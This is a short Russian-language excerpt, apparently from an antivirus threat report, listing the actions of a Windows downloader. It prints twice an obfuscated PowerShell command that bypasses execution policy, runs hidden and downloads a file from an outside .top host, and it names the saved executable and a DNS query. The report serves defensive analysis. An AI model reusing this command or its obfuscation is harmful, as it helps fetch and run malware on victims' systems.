Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWERShELl.ExE ^-^eXEc^U^TioN^Policy ^b^Y^P^As^s -N^O^p^Ro^F^I^le^ -W^IND^OwSTY^l^e^ H^idden^ (^New-^OBJeCT^ sys^t^Em.ne^t.wE^B^C^liEnT).D^OWNL^o^AdfilE^('http://www.zonedope...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "poWERShELl.ExE ^-^eXEc^U^TioN^Policy ^b^Y^P^As^s -N^O^p^Ro^F^I^le^ -W^IND^OwSTY^l^e^ H^idden^ (^New-^OBJeCT^ sys^t^Em.ne^t.wE^B^C^liEnT).D^OWNL^o^AdfilE^('http://www.zonedope...' (со скрытым окном)